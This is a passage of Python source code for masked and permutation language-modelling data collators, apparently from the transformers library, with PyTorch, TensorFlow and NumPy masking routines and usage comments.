For best performance, this data collator should be used with a dataset having items that are dictionaries or
BatchEncoding, with the `"special_tokens_mask"` key, as returned by a [`PreTrainedTokenizer`] or a
[`PreTrainedTokenizerFast`] with the argument `return_special_tokens_mask=True`.
</Tip>"""
tokenizer: PreTrainedTokenizerBase
mlm: bool = True
mlm_probability: float = 0.15
pad_to_multiple_of: Optional[int] = None
tf_experimental_compile: bool = False
return_tensors: str = "pt"
def __post_init__(self):
if self.mlm and self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. "
"You should pass `mlm=False` to train on causal language modeling instead."
)
if self.tf_experimental_compile:
import tensorflow as tf
self.tf_mask_tokens = tf.function(self.tf_mask_tokens, jit_compile=True)
@staticmethod
def tf_bernoulli(shape, probability):
import tensorflow as tf
prob_matrix = tf.fill(shape, probability)
return tf.cast(prob_matrix - tf.random.uniform(shape, 0, 1) >= 0, tf.bool)
def tf_mask_tokens(
self, inputs: Any, vocab_size, mask_token_id, special_tokens_mask: Optional[Any] = None
) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import tensorflow as tf
input_shape = tf.shape(inputs)
# 1 for a special token, 0 for a normal token in the special tokens mask
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
masked_indices = self.tf_bernoulli(input_shape, self.mlm_probability) & ~special_tokens_mask
# Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens
labels = tf.where(masked_indices, inputs, -100)
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = self.tf_bernoulli(input_shape, 0.8) & masked_indices
inputs = tf.where(indices_replaced, mask_token_id, inputs)
# 10% of the time, we replace masked input tokens with random word
indices_random = self.tf_bernoulli(input_shape, 0.1) & masked_indices & ~indices_replaced
random_words = tf.random.uniform(input_shape, maxval=vocab_size, dtype=tf.int64)
inputs = tf.where(indices_random, random_words, inputs)
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
import tensorflow as tf
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="tf", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _tf_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True)
for val in batch["input_ids"].numpy().tolist()
]
# Cannot directly create as bool
special_tokens_mask = tf.cast(tf.convert_to_tensor(special_tokens_mask, dtype=tf.int64), tf.bool)
else:
special_tokens_mask = tf.cast(special_tokens_mask, tf.bool)
batch["input_ids"], batch["labels"] = self.tf_mask_tokens(
tf.cast(batch["input_ids"], tf.int64),
special_tokens_mask=special_tokens_mask,
mask_token_id=self.tokenizer.mask_token_id,
vocab_size=len(self.tokenizer),
)
else:
labels = batch["input_ids"]
if self.tokenizer.pad_token_id is not None:
# Replace self.tokenizer.pad_token_id with -100
labels = tf.where(labels == self.tokenizer.pad_token_id, -100, labels)
else:
labels = tf.identity(labels) # Makes a copy, just in case
batch["labels"] = labels
return batch
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="pt", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _torch_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
batch["input_ids"], batch["labels"] = self.torch_mask_tokens(
batch["input_ids"], special_tokens_mask=special_tokens_mask
)
else:
labels = batch["input_ids"].clone()
if self.tokenizer.pad_token_id is not None:
labels[labels == self.tokenizer.pad_token_id] = -100
batch["labels"] = labels
return batch
def torch_mask_tokens(self, inputs: Any, special_tokens_mask: Optional[Any] = None) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import torch
labels = inputs.clone()
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
probability_matrix = torch.full(labels.shape, self.mlm_probability)
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
special_tokens_mask = torch.tensor(special_tokens_mask, dtype=torch.bool)
else:
special_tokens_mask = special_tokens_mask.bool()
probability_matrix.masked_fill_(special_tokens_mask, value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
import numpy as np
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="np", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _numpy_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
batch["input_ids"], batch["labels"] = self.numpy_mask_tokens(
batch["input_ids"], special_tokens_mask=special_tokens_mask
)
else:
labels = np.copy(batch["input_ids"])
if self.tokenizer.pad_token_id is not None:
labels[labels == self.tokenizer.pad_token_id] = -100
batch["labels"] = labels
return batch
def numpy_mask_tokens(self, inputs: Any, special_tokens_mask: Optional[Any] = None) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import numpy as np
labels = np.copy(inputs)
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
probability_matrix = np.full(labels.shape, self.mlm_probability)
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
            special_tokens_mask = np.array(special_tokens_mask, dtype=bool)
else:
            special_tokens_mask = special_tokens_mask.astype(bool)
probability_matrix[special_tokens_mask] = 0
# Numpy doesn't have bernoulli, so we use a binomial with 1 trial
        masked_indices = np.random.binomial(1, probability_matrix, size=probability_matrix.shape).astype(bool)
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
        indices_replaced = np.random.binomial(1, 0.8, size=labels.shape).astype(bool) & masked_indices
inputs[indices_replaced] = self.tokenizer.mask_token_id
# 10% of the time, we replace masked input tokens with random word
# indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
indices_random = (
            np.random.binomial(1, 0.5, size=labels.shape).astype(bool) & masked_indices & ~indices_replaced
)
random_words = np.random.randint(
low=0, high=len(self.tokenizer), size=np.count_nonzero(indices_random), dtype=np.int64
)
inputs[indices_random] = random_words
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
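# Illustrative usage sketch for DataCollatorForLanguageModeling (values are examples):
# with mlm=True, roughly mlm_probability of the non-special tokens are selected; of
# those, about 80% become the mask token, about 10% become random tokens, and the
# rest stay unchanged, while labels are -100 everywhere except the selected positions.
#
#   from transformers import AutoTokenizer
#   tok = AutoTokenizer.from_pretrained("bert-base-uncased")
#   collator = DataCollatorForLanguageModeling(tok, mlm=True, mlm_probability=0.15)
#   examples = [tok("the quick brown fox"), tok("jumps over the lazy dog")]
#   batch = collator(examples)
#   # (batch["labels"] != -100) marks the positions the MLM loss is computed on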
@dataclass
class DataCollatorForWholeWordMask(DataCollatorForLanguageModeling):
"""
Data collator used for language modeling that masks entire words.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for masked language modeling
<Tip>
This collator relies on details of the implementation of subword tokenization by [`BertTokenizer`], specifically
that subword tokens are prefixed with *##*. For tokenizers that do not adhere to this scheme, this collator will
produce an output that is roughly equivalent to [`.DataCollatorForLanguageModeling`].
</Tip>"""
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _torch_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
for id in tolist(e["input_ids"]):
token = self.tokenizer._convert_id_to_token(id)
ref_tokens.append(token)
            # For Chinese tokens, we need extra info to mark sub-words, e.g. [喜,欢] -> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _torch_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.torch_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _tf_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
for id in tolist(e["input_ids"]):
token = self.tokenizer._convert_id_to_token(id)
ref_tokens.append(token)
            # For Chinese tokens, we need extra info to mark sub-words, e.g. [喜,欢] -> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _tf_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.tf_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _numpy_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
for id in tolist(e["input_ids"]):
token = self.tokenizer._convert_id_to_token(id)
ref_tokens.append(token)
            # For Chinese tokens, we need extra info to mark sub-words, e.g. [喜,欢] -> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _numpy_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.numpy_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def _whole_word_mask(self, input_tokens: List[str], max_predictions=512):
"""
Get 0/1 labels for masked tokens with whole word mask proxy
"""
if not isinstance(self.tokenizer, (BertTokenizer, BertTokenizerFast)):
warnings.warn(
"DataCollatorForWholeWordMask is only suitable for BertTokenizer-like tokenizers. "
"Please refer to the documentation for more information."
)
cand_indexes = []
for (i, token) in enumerate(input_tokens):
if token == "[CLS]" or token == "[SEP]":
continue
if len(cand_indexes) >= 1 and token.startswith("##"):
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
random.shuffle(cand_indexes)
num_to_predict = min(max_predictions, max(1, int(round(len(input_tokens) * self.mlm_probability))))
masked_lms = []
covered_indexes = set()
for index_set in cand_indexes:
if len(masked_lms) >= num_to_predict:
break
# If adding a whole-word mask would exceed the maximum number of
# predictions, then just skip this candidate.
if len(masked_lms) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
covered_indexes.add(index)
masked_lms.append(index)
if len(covered_indexes) != len(masked_lms):
raise ValueError("Length of covered_indexes is not equal to length of masked_lms.")
mask_labels = [1 if i in covered_indexes else 0 for i in range(len(input_tokens))]
return mask_labels
def torch_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
        Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Passing
        'mask_labels' means we use whole-word masking (wwm); indices are masked directly according to this reference.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = inputs.clone()
        # We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability, which defaults to 0.15 in Bert/RoBERTa)
probability_matrix = mask_labels
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
probability_matrix.masked_fill_(padding_mask, value=0.0)
masked_indices = probability_matrix.bool()
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def tf_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
        Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Passing
        'mask_labels' means we use whole-word masking (wwm); indices are masked directly according to this reference.
"""
import tensorflow as tf
input_shape = tf.shape(inputs)
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = tf.identity(inputs)
        # We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability, which defaults to 0.15 in Bert/RoBERTa)
masked_indices = tf.cast(mask_labels, tf.bool)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels
]
masked_indices = masked_indices & ~tf.cast(special_tokens_mask, dtype=tf.bool)
if self.tokenizer._pad_token is not None:
padding_mask = inputs == self.tokenizer.pad_token_id
masked_indices = masked_indices & ~padding_mask
# Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens
labels = tf.where(masked_indices, inputs, -100)
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = self.tf_bernoulli(input_shape, 0.8) & masked_indices
inputs = tf.where(indices_replaced, self.tokenizer.mask_token_id, inputs)
# 10% of the time, we replace masked input tokens with random word
indices_random = self.tf_bernoulli(input_shape, 0.1) & masked_indices & ~indices_replaced
random_words = tf.random.uniform(input_shape, maxval=len(self.tokenizer), dtype=tf.int64)
inputs = tf.where(indices_random, random_words, inputs)
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def numpy_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
        Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Passing
        'mask_labels' means we use whole-word masking (wwm); indices are masked directly according to this reference.
"""
import numpy as np
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = np.copy(inputs)
        # We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability, which defaults to 0.15 in Bert/RoBERTa)
        masked_indices = mask_labels.astype(bool)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
        masked_indices[np.array(special_tokens_mask, dtype=bool)] = 0
if self.tokenizer._pad_token is not None:
padding_mask = labels == self.tokenizer.pad_token_id
masked_indices[padding_mask] = 0
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
        indices_replaced = np.random.binomial(1, 0.8, size=labels.shape).astype(bool) & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
# indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
indices_random = (
            np.random.binomial(1, 0.5, size=labels.shape).astype(bool) & masked_indices & ~indices_replaced
)
random_words = np.random.randint(low=0, high=len(self.tokenizer), size=labels.shape, dtype=np.int64)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
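# Illustrative usage sketch for DataCollatorForWholeWordMask (assumes a BERT-style
# tokenizer whose subword pieces are prefixed with "##"): pieces of the same word are
# grouped, so a word is either fully masked or left intact. Note the output contains
# only "input_ids" and "labels"; no attention mask is produced by this collator.
#
#   from transformers import AutoTokenizer
#   tok = AutoTokenizer.from_pretrained("bert-base-uncased")
#   wwm_collator = DataCollatorForWholeWordMask(tok, mlm_probability=0.15)
#   examples = [tok("unbelievable weather today"), tok("tokenization splits words")]
#   batch = wwm_collator(examples)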
@dataclass
class DataCollatorForSOP(DataCollatorForLanguageModeling):
"""
Data collator used for sentence order prediction task.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for both masked language modeling and sentence order prediction
"""
def __init__(self, *args, **kwargs):
warnings.warn(
"DataCollatorForSOP is deprecated and will be removed in a future version, you can now use "
"DataCollatorForLanguageModeling instead.",
FutureWarning,
)
def __call__(self, examples: List[Dict[str, Any]]) -> Dict[str, Any]:
import torch
from torch.nn.utils.rnn import pad_sequence
input_ids = [example["input_ids"] for example in examples]
input_ids = _torch_collate_batch(input_ids, self.tokenizer)
input_ids, labels, attention_mask = self.mask_tokens(input_ids)
token_type_ids = [example["token_type_ids"] for example in examples]
        # the size of segment_ids varies because of randomness; pad to the end with the pad token, as in the original implementation
token_type_ids = pad_sequence(token_type_ids, batch_first=True, padding_value=self.tokenizer.pad_token_id)
sop_label_list = [example["sentence_order_label"] for example in examples]
sentence_order_label = torch.stack(sop_label_list)
return {
"input_ids": input_ids,
"labels": labels,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
"sentence_order_label": sentence_order_label,
}
def mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any]:
"""
Prepare masked tokens inputs/labels/attention_mask for masked language modeling: 80% MASK, 10% random, 10%
        original. N-gram masking is not applied yet.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = inputs.clone()
        # We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability, which defaults to 0.15 in Bert/RoBERTa)
probability_matrix = torch.full(labels.shape, self.mlm_probability)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
probability_matrix.masked_fill_(padding_mask, value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
        # a probability of `1` means masked; however, in the ALBERT model an attention mask of `0` means masked, so invert the value
attention_mask = (~masked_indices).float()
if self.tokenizer._pad_token is not None:
attention_padding_mask = labels.eq(self.tokenizer.pad_token_id)
attention_mask.masked_fill_(attention_padding_mask, value=1.0)
labels[~masked_indices] = -100 # We only compute loss on masked tokens, -100 is default for CE compute
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels, attention_mask
@dataclass
class DataCollatorForPermutationLanguageModeling(DataCollatorMixin):
"""
Data collator used for permutation language modeling.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for permutation language modeling with procedures specific to XLNet
"""
tokenizer: PreTrainedTokenizerBase
plm_probability: float = 1 / 6
max_span_length: int = 5 # maximum length of a span of masked tokens
return_tensors: str = "pt"
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _torch_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.torch_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _tf_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.tf_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _numpy_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.numpy_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def torch_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if inputs.size(1) % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = inputs.clone()
# Creating the mask and target_mapping tensors
masked_indices = torch.full(labels.shape, 0, dtype=torch.bool)
target_mapping = torch.zeros((labels.size(0), labels.size(1), labels.size(1)), dtype=torch.float32)
for i in range(labels.size(0)):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = labels.size(1)
while cur_len < max_len:
# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
span_length = torch.randint(1, self.max_span_length + 1, (1,)).item()
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
# Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length`
start_index = cur_len + torch.randint(context_length - span_length + 1, (1,)).item()
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
            # the i-th prediction corresponds to the i-th token.
target_mapping[i] = torch.eye(labels.size(1))
special_tokens_mask = torch.tensor(
[self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()],
dtype=torch.bool,
)
masked_indices.masked_fill_(special_tokens_mask, value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
masked_indices.masked_fill_(padding_mask, value=0.0)
# Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
non_func_mask = ~(padding_mask | special_tokens_mask)
inputs[masked_indices] = self.tokenizer.mask_token_id
labels[~masked_indices] = -100 # We only compute loss on masked tokens
perm_mask = torch.zeros((labels.size(0), labels.size(1), labels.size(1)), dtype=torch.float32)
for i in range(labels.size(0)):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
perm_index = torch.arange(labels.size(1))
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = perm_index.reshape((-1, labels.size(1) // 2)).transpose(0, 1)
# Permute the two halves such that they do not cross over
perm_index = perm_index[torch.randperm(labels.size(1) // 2)]
# Flatten this out into the desired permuted factorisation order
perm_index = torch.flatten(perm_index.transpose(0, 1))
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index.masked_fill_(~masked_indices[i] & non_func_mask[i], -1)
            # The logic for whether the i-th token can attend to the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask[i] = (
perm_index.reshape((labels.size(1), 1)) <= perm_index.reshape((1, labels.size(1)))
) & masked_indices[i]
return inputs.long(), perm_mask, target_mapping, labels.long()
def tf_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
from random import randint
import numpy as np
import tensorflow as tf
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if tf.shape(inputs)[1] % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = tf.identity(inputs)
# Creating the mask and target_mapping tensors
        masked_indices = np.full(labels.shape.as_list(), 0, dtype=bool)
labels_shape = tf.shape(labels)
target_mapping = np.zeros((labels_shape[0], labels_shape[1], labels_shape[1]), dtype=np.float32)
for i in range(len(labels)):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = tf.shape(labels)[1]
while cur_len < max_len:
# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
span_length = randint(1, self.max_span_length + 1)
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
# Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length`
start_index = cur_len + randint(0, context_length - span_length + 1)
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
            # the i-th prediction corresponds to the i-th token.
target_mapping[i] = np.eye(labels_shape[1])
masked_indices = tf.cast(tf.convert_to_tensor(masked_indices), dtype=tf.bool)
target_mapping = tf.convert_to_tensor(target_mapping)
special_tokens_mask = tf.convert_to_tensor(
[
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True)
for val in labels.numpy().tolist()
],
)
special_tokens_mask = tf.cast(special_tokens_mask, dtype=tf.bool)
masked_indices = masked_indices & ~special_tokens_mask
if self.tokenizer._pad_token is not None:
padding_mask = labels == self.tokenizer.pad_token_id
masked_indices = masked_indices & ~padding_mask
